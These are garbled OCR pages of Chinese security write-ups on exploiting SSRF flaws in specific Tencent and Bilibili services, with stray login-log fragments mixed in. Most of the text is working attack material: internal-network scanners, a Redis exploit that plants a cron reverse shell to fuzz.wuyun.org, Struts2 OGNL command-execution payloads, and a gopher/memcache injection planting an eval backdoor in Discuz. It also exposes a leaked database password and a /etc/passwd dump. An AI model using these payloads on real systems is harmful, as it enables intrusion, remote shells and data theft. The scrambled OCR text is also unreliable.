root pts/0 10.21.100.82 Sat Oct 3 16:31 - 05:01 
(12:29) 
root pts/0 10.21.100.82 Tue Sep 22 14:49 - 14:49 
(00:00) 
root pts/0 10.21.100.81 Fri Sep 18 16:52 - 05:01 
(12:08) 
root pts/0 10.200.100.33 Wed Sep 2 12:23 - 15:21 
(02:58) 
root pts/0 10.200.100.33 Wed Sep 2 12:06 - 12:07 
(00:01) 
root pts/0 10.21.100.81 Tue Sep 1 10:45 - 11:20 
(00:35) 
root pts/0 10.200.100.33 Wed Aug 26 11:30 - 15:26 
(03:56) 
root pts/1 10.21.100.82 Fri Aug 21 04:19 - 05:01 
(00:41) 
root pts/0 10.21.100.82 Thu Aug 20 11:30 - 05:01 
(17:30) 
root pts/0 10.21.100.82 Wed Aug 19 11:14 - 05:01 
(17:46) 
root pts/0 10.21.100.82 Fri Aug 14 10:48 - 05:01 
(18:12) 
root pts/0 10.21.100.82 Mon Aug 10 09:00 - 05:01 
(20:00) 
root pts/0 10.21.100.82 Sun Aug 9 20:24 - 05:01 
(08:36) 
root pts/1 10.200.100.33 Fri Aug 7 10:48 - 14:49 
(04:00) 
root pts/0 10.21.100.82 Fri Aug 7 09:19 - 05:01 


(19:41) 


root 


(19: 


root 


(18: 


root 


(08: 


root 
(04 
root 


(00: 


wtmp 


[root@lg-sec-weblog01 ~]# rm /var/spoo: 


55) 


28) 


27) 


:42) 


00) 


pts/0 


pts/0 


pts/0 


pts/0 


pts/0 


10.21.100. 


10.21.100. 


10.21.100. 


10.21.100. 


10.21.100. 


begins Fri Apr 10 14:00:41 


rm /var/spool/cron/root 


[root@lg-sec-weblog01 ~]# 


82 


82 


82 


82 


Thu 


Wed 


Tue 


Tue 


Tue 


Aug 


Jul 


Jul 


Jul 


Jul 


6 


29 


28 


28 


28 


09:05 


10:32 


20:33 
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15:50 


05:01 


05:01 


05:01 


20:33 


15:51 


腾讯 东 处 SSRF 漏 洞 ( 非 第 好 的 利用 点 ) 附 利用 脚 
本 


1. 描述 


本 文章 将 概述 一 些 经 典 的 SSRF 漏 洞 利 用 原理 ， 从 Fuzz 扫 描 开 放 的 服务 到 漏洞 的 自 
动 化 利用 ， 刚 好 腾讯 的 这 个 漏洞 点 ， 非 常 适 合 做 为 案例 来 演示 。 


1.1 漏洞 信息 


腾讯 微 博 应 用 http://share.v.t.qq.com SSRF 利 用 点 ， 参 数 : url 
http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http://wuyun.org 


1.2 服务 端 回 显 


当 从 ssrf 利 用 点 发 起 一 个 远程 请 求 ， 如 果 url 资 源 存在 ， 且 MIME 类 型 为 HTML， 服 务 
端的 脚本 会 分 析出 HTML 页 面 内 的 title、img 等 等 资源 ， 返 回 给 客户 端 ? 如 果 MIME 
是 其 它 类 型 ， 将 直接 返回 原文 。 


例 1 请 求 远程 服务 器 的 22 端 口 ， 直 接 回 显 ODpenSSH 的 banner 信 
自 


Dory 


[root@localhost wyssrf]# curl 'http://share.v.t.qq.com/index.php 
?c-share&a-pageinfo&url-http://fuzz.wuyun.org:22' 
cre "Om daca d typo 1 "txtlo $'" SSH-2:0-0DpensSH-5:3- e 小 小 


1/12 请 求 远程 服务 器 的 80 端 口 ， 回 显 HEAD 和 图 片 资源 


[root@localhost wyssrf]# curl 'http://share.v.t.qq.com/index.php 
?c-share&a-pageinfo&url-http://www.baidu.com' 

("ret":0, "data": {"type":2, "pics": ["http:\/\/www.baidu.com\/img\/ 
baidu_sylogo1.gif"],"title":"\u767e\u5ea6\u4e00\u4e0b\uffoc\u4f6 
O\u5c31\u77e5\u9053"}} 


例 3 请 求 不 存在 的 服务 器 或 未 开放 的 端口 


A tc icd curl *http://share.v.t.qq.com/index. php 
share&a-pageinfo&url-http://fuzz.wu ( 3888 ° 


(ret":1) 


1.3 利用 场景 


Loction 302 跳 转 辅 助 脚本 302.php 


<?php 

$ip = $_GET['ip']; 

$port = $ GET['port']; 

$scheme = $ GET['s']; 

$data - $ GET['data']; 

header("Location: $scheme://$ip:$port/$data"); 
?> 


1.4 服务 端 支持 协议 
Dict» -> dict://fuzz.wuyun.org:8080/helo:dict 


/302.php?s-dict&ip-fuzz.wuyun.org&port-8080&data-helo:dict 


[root@localhost wyssrf]# nc -1 -vv 8080 

Connection from 113.108.10.15 port 8080 [tcp/webcache] accepted 
CLIENT libcurl 7.15.1 

helo dict 

QUIT 


Gopher? à -> gopher://fuzz.wuyun.org:8080/gopher 


/302.php?s-gopher&ip-fuzz.wuyun.org&port-8080&data-gopher 


[root@localhost wyssrf]# nc -1 -vv 8080 
Connection from 113.108.10.16 port 8080 [tcp/webcache] accepted 


GET /gopher HTTP/1.1 
Host: 106.75.199.107:8080 


Accept: */* 


Filet -> file:///etc/passwd 


这 里 需要 一 个 辅助 脚本 


<?php 
header("Location: file:///etc/passwd"); 


?> 


服务 器 请 求 302 跳 转 ， 直 接 读 取 到 服务 器 本 地 文件 


na 


[root@localhost wyssrf]# curl 'http://share.v.t.qq.com/index.php 


?c=share&a=pageinfo&url=http://fuzz.wuyun.org/file.php' 
i ret": 0, "data": {type T "titlo":"root:x*0*0 roots /roo X/DbiTUN 


bash on me Xe 让 


综 上 所 述 得 出 结论 
从 回 显 结果 可 以 判断 服务 端的 cur| 为 低 版 本 的 7.15.1， 支 持 dict,ftp,gopher,dict 等 协 
IL 


[root@localhost wyssrf]# curl -V 


Protocols: tftp ftp telnet dict gopher ldap ldaps http file http 


s ftps scp sftp 


2. 漏洞 利用 


鉴于 gopher:// 是 一 个 万 金 油 的 服务 ， 这 里 不 对 该 协议 进行 利用 描述 ， 相 关 技 术 大 家 
可 以 自 very ， 本文 重 点 讲解 如 何 探测 开放 的 网 络 服务 和 漏洞 利用 ， 在 乌云 峰会 
结束 后 ， 行内 容 的 更 新 ， 加 入 一 些 其 他 利用 方法 。 


FOLDERS 








at aassrf.py d wyssrf.py 
> D docs #!/usr/bin/env python 
v E» exploit # encoding: utf-8 
[3 . init .py 
[3 couchdb.py 
[3 elasticsearch.py 
[3 ftp.py 
[3 gopher.py 
[3 hfs.py 
[3 jboss.py 
[3 jenkins.py 
[A pop-PY eoe ssrf — python wyssrf.py -i — 89x30 
EAM 172-13-0-87:ssrf reinhard$ python wyssrf.py 
[3 pstack.py Usage: 
red wyssrf config -u «url» -p «param» [--data <data>] 
D shellshock.py wyssrf config —show 
[3 smtp.py wyssrf plugin —list 
[3 struts.py wyssrf exploit —list 
D tftp.py wyssrf (-i | —interactive) 
wyssrf (-h | —help | --version) 
[R tomcat.py 172-13-0-87:ssrf reinhard$ python wyssrf.py config -u 'http://share.v.t.qq. com/index.php? 
Bt webdav.py c-share&a-pageinfo&url-http://wuyun.org' -p url 
K D lib [INFO] config file save success... 
» C3 payload 172-13-0-87:ssrf reinhard$ python wyssrf.py -i 
* E» plugin Eh Welcome to WYSSRF Exploit Framework (type help for a list of commands.) 
D default.py Ililiconsole» show config 
Bier F "url": "http://share.v.t.qq.com/index.php?c=share&a=pageinfo&url=http: //wuyun.org", 
[3 protocol_fuzz.py "method": "GET", 
[3 weblogic.py "param": "url" 
[3 wordpress.py i à 
console» redis 
prios Invalid Command... 
v B utils Usage: 
E 一 nit 一 py hi redis shell «host» «port» <bhost> <bport> [--type=<TYPE>] 
[3 cloudeye.py F redis ssh «host» «port» <keyfile> [--type=<TYPE>] 
[3 dnsserver.py DE console» I 
D exrex.py 
[3 fileutils.py 
因 misc.py 
[3) request.py 





L3 Line 94, Column 27 


2.1 对 开放 的 网 络 服务 进行 探测 


这 个 漏洞 地 址 是 t.qq.com， 腾 讯 微 博 的 ， 确 定 内 网 地 址 ， 只 需要 开局 域名 穷 举 即 
可 ， 比 如 : PING demo.t.qq.com (10.133.42.26) ， 就 大 概 知道 腾讯 微 博 的 内 网 地 
HE 针对 国定 的 10. 网 络 B 段 、C 段 进行 遍历 探测 





#!/usr/bin/env python 
# encoding: utf-8 
4 email: ringzero@0x557.org 
import requests 
import time 
import random 
port = '80' 
# fuzz local C 
for c in xrange(0, 255): 
for d in xrange(0, 255): 
ip = '10.133.{0}.{1}'.format(c,d) 
payload = 'http://{ip}:{port}/'.format(ip=ip, port=port) 
url = 'http://share.v.t.qq.com/index.php?c=share&a=pagei 
nfo&url-(payload)'.format( 
payload-payload) 
# len(("ret":1)) == 9 
if len(requests.get(url).content) !- 9: 
print ip, port, 'OPEN', requests.get(url).content 


随机 针对 内 网 10. 网 段 进 行 探测 


co 


腾讯 某 处 SSRF 漏 洞 (非常 好 的 利用 点 ) 附 利用 脚本 


#!/usr/bin/env python 
# encoding: utf-8 
4 email: ringzero@0x557.org 
import requests 
import time 
import random 
port = '80' 
# random fuzz local ip 
while True: 
ip = '10.{0}.{1}.{2}'.format(random.randint(1, 254),random.r 
andint(1, 254),random.randint(1, 254)) 
payload = 'http://{ip}:80/'.format(ip=ip) 
url = 'http://share.v.t.qq.com/index.php?c-share&a-pageinfo& 
url={payload}'.format ( 
pay load=payload) 
# len({"ret":1}) == 9 
if len(requests.get(url).content) != 9: 
print ip, port, 'OPEN', requests.get(url).content 


2.2 对 已 开放 的 服务 进行 漏洞 利用 
这 里 描述 的 利用 内 容 ， 使 用 的 dict 协 议 ，dict 提 供 了 一 个 非常 棒 的 功能 


dict://serverip:port/name:data 向 服务 器 的 端口 请 求 name data， 并 在 末尾 自动 
补 上 \r\In(CRLF)， 为 漏洞 利用 增添 了 便利 REDIS Server 的 命令 接收 格式 为 : 
command var data Wn 实战 利用 代码 如 下 


#!/usr/bin/env python 

# encoding: utf-8 

# email: ringzero@0x557.org 

import requests 

host = '42.62.67.198' 

port = '6379' 

bhost = 'fuzz.wuyun.org' 

bport = '8080' 

vul_httpurl = 'http://share.v.t.qq.com/index.php?c=share&a=p 
ageinfo&url=' 

location = 'http://fuzz.wuyun.org/302.php' 
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腾讯 茶 处 SSRF 漏 洞 (非常 好 的 利用 点 ) 附 利用 脚本 


shell location = 'http://fuzz.wuyun.org/shell.php' 
#1 flush db 
_payload = '?s=dict%26ip={host }%26port={port }%26data=flushal 
Ly. Format ( 

host = host, 

port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg'.format(_location, 
payload, vul httpurl-vul httpurl) 
print exp-uri 
print requests.get(exp uri).content 
42 set crontab command 
payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost 
}%26bport={bport}'.format( 

host = host, 

port = port, 

bhost = bhost, 

bport = bport) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg'.format(shell_loca 
tion, _payload, vul httpurl-vul httpurl) 


print exp uri 
print requests.get(exp uri).content 
#3 config set dir /var/spool/cron/ 
payload = '?s=dict%26ip={host }%26port={port }%26data=config: 
set:dir:/var/spool/cron/' .format ( 
host = host, 
port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg'.format(_location, 
payload, vul httpurl-vul httpurl) 
print exp uri 
print requests.get(exp uri).content 
#4 config set dbfilename root 
payload = '?s=dict%26ip={host}%26port={port }%26data=config: 
set :dbfilename:root'.format( 
host = host, 
port = port) 
exp uri = ‘{vul_httpurl}{0}{1}%23helo.jpg'.format(_ location, 
payload, vul httpurl-vul httpurl) 
print exp uri 
print requests.get(exp uri).content 
#5 save to file 
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腾讯 某 处 SSRF 漏 洞 (非常 好 的 利用 点 ) 附 利用 脚本 


_payload = '?s=dict%26ip={host }%26port={port}%26data=save'.f 
ormat ( 

host = host, 

port = port) 
exp uri = '{vul_httpurl}{0}{1}%23helo.jpg'.format(_location, 
payload, vul httpurl-vul httpurl) 
print exp uri 
print requests.get(exp uri).content 


shell.php 辅助 脚本 


<?php 

$ip = $ GET['ip']; 

$port = $ GET['port']; 

$bhost = $ GET['bhost']; 

$bport = $ GET['bport']; 

$scheme = $_GET['s']; 

header("Location: $scheme://$ip:$port/set:0:\"\\xOa\\x0a*/1\ 
\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20 


/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\""); 
ie 


3. 漏洞 十 明 
配置 利用 变量 


reinhard$ python wyssrf.py 
Usage: 
wyssrf config -u <url> -p <param> [--data <data>] 
wyssrf config --show 
wyssrf plugin --list 
wyssrf exploit --list 
wyssrf (-i | --interactive) 
wyssrf (-h | --help | --version) 
reinhard$ python wyssrf.py config -u 'http://share.v.t.qq.co 
m/index.php?c-share&a-pageinfo&url-http://wuyun.org' -p url 
[INFO] config file save success... 
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3.1 针对 redis 进 行 漏洞 利用 
根据 上 面 的 原理 做 成 利用 脚本 


[172-13-0-87:ssrf reinhard$ python wyssrf.py -i 
Welcome to WYSSRF Exploit FrameWork (type help for a list of commands.) 
[console> show config 


{ 
"url": "http://share.v.t.qq. com/index. php?c=share&a=pageinfo&url=http: //wuyun.org", 
"method": "GET", 
"param": "url" 
} 
console> redis -h 
Usage: 
redis shell «host» «port» «bhost» <bport> [—-type=<TYPE>] 
redis ssh «host» «port» «keyfile» [——type-«TYPE»] 
Options: 


-t, —type-«TYPE- request protocol type [default: dict] 
[console> redis shell 42.62.67.198 6379 fuzz.wuyun.org 8080 —-type dict 
[INFO] Exploit 42.62.67.198 6379 Start... 

[INFO] #1 flush redis db 

[INFO] 42 set crontab command 

[INFO] #3 config set dir /var/spool/cron/ 
[INFO] £4 config set dbfilename root 
[INFO] #5 save to file 

[INFO] Exploit Successs... 

console» i 


WWW.Wooyun.org 


reinhard$ python wyssrf.py -i 

Welcome to WYSSRF Exploit FrameWork (type help for a list of com 
mands.) 

console> show config 

{ 

"url": "http://share.v.t.qq.com/index.php?c=share&a=pageinfo 
&url=http://wuyun.org", 

"method": “GET, 

“params, “url” 

} 
console> redis -h 
Usage: 

redis shell <host> <port> <bhost> <bport> [--type=<TYPE>] 

redis ssh «host» «port» <keyfile> [--type=<TYPE>] 
Options: 

-t, --type=<TYPE> request protocol type [default: dict] 
console» redis shell 42.62.67.198 6379 fuzz.wuyun.org 8080 --typ 
e dict 
[INFO] Exploit 42.62.67.198 6379 Start... 

[INFO] #1 flush redis db 

[INFO] £2 set crontab command 

[INFO] £3 config set dir /var/spool/cron/ 
[INFO] £4 config set dbfilename root 
[INFO] £5 save to file 

[INFO] Exploit Successs... 

console» quit 

Good Bye! 


查询 远程 Redis 服 务 器 的 信息 


reinhard$ redis-cli -h 42.62.67.198 config get dir 
Gl 

2) "/var/spool/cron" 

reinhard$ redis-cli -h 42.62.67.198 config get dbfilename 
1) "dbfilename" 

2) Ook. 


成 功 获得 Redis 服 务 器 Shell 


[root@fuzz.wuyun.org]# | -vv 8080 

Connection from 42.62.67.198 port 8080 [tcp/webcache] accepted 
bash: no job control in this shell 

[root@10-6-17-197 ~]# id 

id 

uid-O(root) gid=0(root) groups-O(root) 

[root@10-6-17-197 -]# cat /var/spool/cron/root 

cat /var/spool/cron/root 

REDISO006"QB 

*/1* * * * /bin/bash -i >& /dev/tcp/fuzz.wuyun.org/8080 0»&1 
…[root@10-6-17-197 ~] 


3.2 Struts2 命令 执行 规则 表 


Struts2 -- 032 

ping s2032.struts.99fd5e.dnslog.info 

GET /?method:%23 memberAccess%3d@ognl.OgnlContext@DEFAULT MEMBER 
_ ACCESS, %23res%3d%400rg.apache.struts2.ServletActionContext%40ge 
tResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0 
]), %23w%3d%23res.getWriter(),%23s%3dnewt+java.util.Scanner(@java. 
lang .Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStr 
eam()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s . hasNext ( ) 
%3f%23s . next ( )?63a9623parameters.ppp[0],9?623w.print(9623str),9623w.cl 
ose(),1?%23xx :%23request . toString&cmd=ping%20s2032.struts.99fd5e 
.dnslog. info&pp=%5CA&ppp=%20&encoding=UTF -8 

Struts2 -- 019 

ping s2019.struts.99fd5e.dnslog.info 
/?debug=command&expression=#f=#_memberAccess.getClass().getDecla 
redField('allowStaticMethodAccess'),#f.setAccessible(true),#f.se 
t(#_memberAccess, true),#req=@org.apache.struts2.ServletActionCon 
text@getRequest(),#resp=@org.apache.struts2.ServletActionContext 
@getResponse().getWriter(),#a=(new java. lang.ProcessBuilder (new 
java.lang.String[]{'ping', 's2019.struts.99fd5e.dnslog.info'})).s 
tart(),#b=#a.getInputStream(),#c=new java.io. InputStreamReader (# 
b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read( 
#e),#resp.println(#e),#resp.close() 

Struts2 -- 016 

ping s2016.struts.99fd5e.dnslog.info 


/index.action?redirect :$%7B%23a%3d(new%20java.lang.ProcessBuilde 
r(new?220java.lang.String9?965B965D9020967B'ping', 's2016.struts.99fd5e. 
dnslog.info'%7D)).start( ),%23b%3d%23a.getInputStream( ),%23c%3dne 
w%20java.io.InputStreamReader%20(%23b ),%23d%3dnew%20java.io.Buff 
eredReader (%23c ) , %23e%3dnew%20char%5B50000%5D, %23d.read(%23e) , %2 
3matt963d96209623context .get('com.opensymphony.xwork2.dispatcher.Ht 
tpServletResponse'),%23matt.getWriter().println#20(%23e),%23matt 
.getWriter().flush(),%23matt.getWriter().close()%7D 

Struts2 -- 013 

ping s2013.struts.99fd5e.dnslog.info 
/?a=1${(%23_memberAccess["allowStaticMethodAccess" ]=true, %23a=@j 
ava. lang.Runtime@getRuntime().exec('ping s2013.struts.99fd5e.dns 
log.info').getInputStream(),%23b=new+java.io.InputStreamReader (% 
23a) ,%23c=newtjava.io.BufferedReader (%23b) ,%23d=new+char [50000], 
%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionConte 
xt@getResponse().getWriter(),%23sbtest.printin(#%23d),%23sbtest.c 
lose())} 

Struts2 -- 009 

ping s2009.struts.99fd5e.dnslog.info 

/?class.classLoader. jarPath=%28%23context["xwork.MethodAccessor. 
denyMethodExecution" |%3d+new+java. lang .Boolean%28false%29%2cC+%23 
_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40jav 
a.lang.Runtime%40getRuntime%28%29 .exec%28%27ping s2009.struts.99 
fd5e.dnslog. info%27%29 .getInputSt ream%28%29%2c%23b%3dnew+ java.io 
. InputStreamReader%28%23a%29%2C%23c%3dnew+java.io.BufferedReader 
2628962 3b962 9962 c962 3d?63dnew-- char [50000 ]962c9623c . read%28%23d%29%2C%23s 
btest%3d%40org.apache.struts2.ServletActionContext%40getResponse 
%28%29 .getWriter%28%29%2c%23sbtest .print1n%28%23d%29%2c%23sbtest 
. CL0SE%28%29%29%28meh%29&z [%28class.classLoader . jarPath%29%28%27 
meh%27%29 ] 

Struts2 -- 005 

ping s2005.struts.99fd5e.dnslog.info 
/?('\43_memberAccess.allowStaticMethodAccess' )(a)=true&(b)(('\43 
context[\'xwork.MethodAccessor .denyMethodExecution\']\75false' ) ( 
b))&('\43c')(('\43 memberAccess.excludeProperties\75@java.util.c 
ollections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ping s2005.struts. 
99fd5e.dnslog.info\'')(d))&(h)(('\43myret\75@java. lang. Runtime@g 
etRuntime().exec(\43mycmd)')(d))&(1)(('\43mydat\75new\40java.io. 
DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\ 
75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d 


))&(1)(('Na3mystrN75newN40java.lang.String(M43myres)')(d))&(m)(( 
'\43myout\75@org.apache.struts2.ServletActionContext@getResponse 
()')(d))&(n)(('\43myout.getwriter().println(\43mystr)')(d)) 


3.5 其 它 乌 云 峰会 后 待 续 


redis.py jboss.py shellshock.py 
axis2.py jdwp.py smtp.py 
confluence.py jenkins.py struts.py 
couchdb.py mongodb. py tftp. py 
docker.py phpcgi.py tomcat ,py 
elasticsearch.py pop.py webdav.py 
ftp.py portscan.py websphere.py 
gopher.py pstack.py zentaopms.py 


hfs.py 


SSRF ił 


绕 过 的 方法 一 般 有 以 下 几 种 1.http://10.100.21.7.xip.io 


2.http://www.10.100.21.7.xip.name 3.http://t.im/14tjq 4. 可 以 将 IP 转 换 为 10 进 制 绕 过 


http://www.sogou.com/reventondc/transform?charset=-GBK&key=%E8%xB0 
96A296E 6969 6968 7%EA%BB%IC1&0b j 1d22000000&type-2&userarea-sss&vrid-70 
043804&url-http://168675196:8080/resin-doc/resource/tutorial/jnd 


i-appconfig/test?inputFile=/etc/passwd%23 


4&| Load URL _ http://www.sogou.com/reventondc/transform?charset=GBK&key - 96EB96B096A296E69696968796E496B8969C1&objid - 2000000&type - 2&userarea - sss&vrid - 70043804&url -http://168675196:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile- 


INT 了 | = @ SQL XSS- Encryption- Encoding- Other 
et d%623 

Q seu, /topassw 

L Execute 


E Enable Post data | | Enable Referrer 


mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 
news:x:9:13:news:/etc/news: 

uucp:x:1l 
operator 


:14:uucp:/var/spool/uucp: /sbin/nologin 
:11:0:operator:/root:/sbin/nologin 





12:100:games:/usr/games:/sbin/nologin 





3:30: gopher: /var/gopher: /sbin/nologin 
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody: x:99:99:Nobody:/:/sbin/nologin 
nscd:x:28:28: 








CD Daemon: /: /sbin/nologin 
rtual console memory owner:/dev:/sbin/nologin 
tc/ntp: /sbin/nologin 






var/arpwatch: /sbin/nologin 

stem message bus bin/nologin 
70:70:Avahi daemon:/:/sbin/nologin 
:32:32:Portmapper RPC user:/:/sbin/nologin 
apache:x:48:48:Apache:/var/www:/sbin/nologin 
mailnull: :/var/spool/mqueue:/sbin/nologin 












/var/spool/mqueue:/sbin/nologin 


:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 
68:68:HAL daemon:/:/sbin/nologin 
avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin 
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin 
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin 
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin 
sabayon:x:86:86:Sabayon user: /home/sabayon:/sbin/nologin 

odin:x:500: :/home/odin: /bin/bash 

nagios:x:101:501:nagios: /var/log/nagios:/bin/sh 

netmonitor:x:501:502:: /home/netmonitor: /bin/bash 


back to demo 


haldaemon: 






6:16:Special user account to be used by OProfile:/home/oprofile: 


sbin/nologin 





www.wooyun.org) 


bilibili 某 分 站 从 信息 泄露 到 ssrf 再 到 命令 执行 


这 个 只 是 memcache 的 案例 ， 如 果 是 redis 更 好 利用 了 


0x00 3j È 


扫描 器 时 常会 扫描 到 一 些 信息 泄露 ， 如 discuz 的 配置 文件 
/config/config_global.php~ 里 面 时 常 带 有 数据 库 密码 等 ， 但 又 苦于 内 网 ， 十 分 夏 
HC o 


0x01 个 例 分 析 
以 bilibili 这 个 为 例 


http://bbs.biligame.com/config/config global.php- 





[C Enable Post data [_] Enable Referrer 






Ñ MHA) SSE EEV) RES 帮助 (H) 


D gi |o (| X da | 4 KIS a E Re 
7 |$ config['db']['1']['dbhost'] - "19 
8 |$ config['db']['1']['dbuser'].- "ganebbs'; 
1']['dbpu']-- ‘Hd! 
积分 商城 18 |$_config['db']['1']['dbcharset'] = "utf8"; 
1]['pconnect'] = "6"; Z/7 此 处 禁止 修改 ! 
1']['dbname'] = 'gamebbs' ; 
13 |$_config['db']['1']['tablepre'] < 'bbs_'; 
1L'slave']=.""; 
15 |$ conFig['db']['conmon'][* slave ' except table'].- 






ce 
= 

o 
o 
9 
s 
* 
E 

r3 
a 
S 


B 今日 : 4478 | 昨日 : 6598 | 帖子 : 4346098 


17 [7/--------------------------- CONFIG - MEMORY - .--------------------------- 77 

18 | $_config{ ‘memory’ ][ preFix'] -.'NTOSSu '; 

19 |$ config{ ‘memory’ ][ 'redis']['server'] ="; 

20 | $_config{ ‘memory’ ][ 'redis'][* 

21 |$ config['nemory' ][ 'redis'][* 

22 $ config['memory'][ 'redis']['ti 
| conFig['nenory' ][ 'redis'][' 


热门 游戏 









NU RERIN (26 
主题 : 51, 帖 数 : 352 
| Bunk Ou 





24 
$ (1759) 25 
S 主题 1124, 帖 数 : 4 万 26 
”最 后 发 表 : 22 秒 前 27 rj] V e 
28 $ config['nmenory' ][ nencache* ]['timeout'] =-1; 
克 重 赛 德 战 记 (115 29 S$_config['memory']['apc'].= 8: 


主题 : 2552, M: 5 万 
最 后 发 表 : 5 分钟 前 


config['memory']['xcache'] = 6; 
31 $ config['memory']['eaccelerator'].- 8; 
32 Z config['memory' ][ 'vincache'].- 8; 


n www.wooyun.org 
O CONFIG : SERVER -.-———---—--——--——------—- H 


BHR (4 
主题 : 557, 帖 数 : 175 





hilihili tAk AS À uS Zl eet B. aAA H 23 
bilibiliZ& TIt ME Ñ. HE $2 2) ssri 2 ap FAT 


<?php 
$_config = array(); 
// _---------------------------- CONFIG DB -------------------- 
--------- 7 
$_config['db']['1']['dbhost'] = '192.168.10-190'; 
$ config['db']['i1']['dbuser'] = 'gamebbs'; 
$ config['db']['1']['dbpw'] = 'HdUbOY2YCAoKi3U0'; 
$ config['db']['1']['dbcharset'] = 'utf8'; 
$ config['db']['1']['pconnect'] = '0'; 
// 此 处 禁止 修改 | 
$ config['db']['1']['dbname'] = 'gamebbs'; 
$ config['db']['1']['tablepre'] = 'bbs '; 
$_config['db']['slave'] = ''; 
$_config['db']['common']['slave_except_table'] = ''; 
//_-------------------------- CONFIG MEMORY ------------------ 
--------- // 
$_config['memory']['prefix'] = 'NTOSSw_'; 
$ config['memory']['redis']['server'] = ''; 
$ config['memory']['redis']['port'] = 6379; 
$_config['memory']['redis']['pconnect'] = 
$ config['memory']['redis']['timeout'] = '0'; 
$ config['memory']['redis']['requirepass'] = ''; 
$ config['memory']['redis']['serializer'] = 1; 
$ config['memory']['memcache']['server'] = '192.168.10.12'; 
$ config['memory']['memcache']['port'] = 11211; 
$ config['memory']['memcache']['pconnect'] = 1; 
$ config['memory']['memcache']['timeout'] = 1; 
$ config['memory']['apc'] - 
$ config['memory']['xcache'] = 
$ config['memory']['eaccelerator'] = 0; 
$ config['memory']['wincache'] - 


注意 到 使 用 了 memcache 如 果 有 留意 到 vBulletin rce 


papers wooyun.org/papers/8261， 相 信 都 被 这 个 漏洞 的 巧妙 之 处 所 吸引 。 那 


么 ， 这 discuz 是 否 也 存在 同样 的 漏洞 呢 ? 于 是 查找 调用 缓存 的 地 方 
\source\function\function_core.php 


function output_replace($content) 1 
global $ 6G; 
if(defined('IN MODCP') || defined('IN ADMINCP')) return $con 
tent; 
if(!empty($ G['setting']['output']['str']['search'])) 1 
if(empty($ G['setting']['domain']['app']['default'])) { 
$ G['setting']['output']['str']['replace'] = str rep 
lace('{CURHOST}', $_G['siteurl'], S26) setting Tr output Tq sth. 
]['replace']); 
} 
$content = str_replace($_G['setting']['output']['str'][' 
search'], $ G['setting']['output']['str']['replace'], $content); 
} 
if(!empty($ G['setting']['output']['preg']['search']) && (em 
pty($ G['setting']['rewriteguest']) || empty($ G['uid']))) { 
if(empty($ G['setting']['domain']['app']['default'])) 1 
$ G['setting']['output']['preg']['search'] = str rep 
lace('\{CURHOST\}', preg quote($ G['siteurl'], '/'), $ G['settin 
g']['output']['preg']['search']); 
$ G['setting']['output']['preg']['replace'] = str re 
place('{CURHOST}', $ G['siteurl'], $ G['setting']['output']['pre 
g']['replace']); 
} 
$content = preg replace($ G['setting']['output']['preg'][ 
'search'], $ G['setting']['output']['preg']['replace'], $content 
); 
} 


return $content; 


j 
EN | 1 


ARAA - i: £A9$ Gl'setting']'output']['preg']['search'] 和 $ G['setting'] 
[output][preg'][replace'] 是 直接 调用 缓存 中 的 数据 。 并且，discuz 的 ssrf 是 存在 多 
处 的 ， 并 且 官 方 估计 也 很 难 去 修复 。 WooYun: Discuz! 另 一 处 SSRF 无 须 登 陆 无 须 
条 件 于 是 测试 ， 居 然 发 现 服务 器 支持 gohper 协议 呀 。 下 面 说 说 利用 过 程 吧 。 
discuz 的 漏洞 详细 分 析 有 必要 的 话 稍 后 再 提交 给 官方 。 


0x02 漏洞 利用 


bilibili 茶 分 站 从 信息 泄露 到 ssrf 再 到 命令 执行 
测试 利用 转发 代码 


<?php 

header('Location: gopher://4 LR #%:80/ %XOd%Oaset NTOSSw setting 
1 0 147%0d%0aa:2:{5:6:"output";a:1:{s:4:"preg";a:2:{s:6: "search 
",s:5:"/.*/e";s:7:"replace";s:33:"eval(base64 decode($ POST[ccc] 
)) pis tet rewrdtestatus ,i:1,}%0d%0a’ 17 

?> 


测试 返回 如 下 图 


Connection from 58.220.29.48 port 80 [tcp/http] accepted 


EHE NTOSSW setting 1 0 132 
2:{s:6:"output"; a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:18: "eval ($_PosT[ccc]);"; }}s:13: NN OU 


Lr ow Je J 


Connection from 58.220. 29.48 port 80 [tcp/http] accepted 


yürtürg 


delete NTOSSw setting 


i 
www.wooyun.org 


万 事 俱 备 了 ， 行 
动 先 准备 好 两 个 页 面 ， 便 于 写 完 shell 后 还 原 。 wshell.php 


<?php 

header('Location: gopher://192.168.10.12:11211/_%0d%Oaset NTOSSw 
_setting 1 0 147%0d%O0aa:2:{$s:6:"output";a:1:{s:4:"preg";a:2:{s:6 
:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64 decode($ P 
OST[ccc]));";}}s:13:"rewritestatus";i:1; }%0d%0a'); 

?> 


cls.php 
<?php 
header('Location: gopher://192.168.10.12:11211/ %0Od%0adelete NTO 


SSw_setting%0d%0a' ); 
?> 


LE 


http://bbs.biligame.com/forum.php?mod-ajax&action-downremoteimg& 
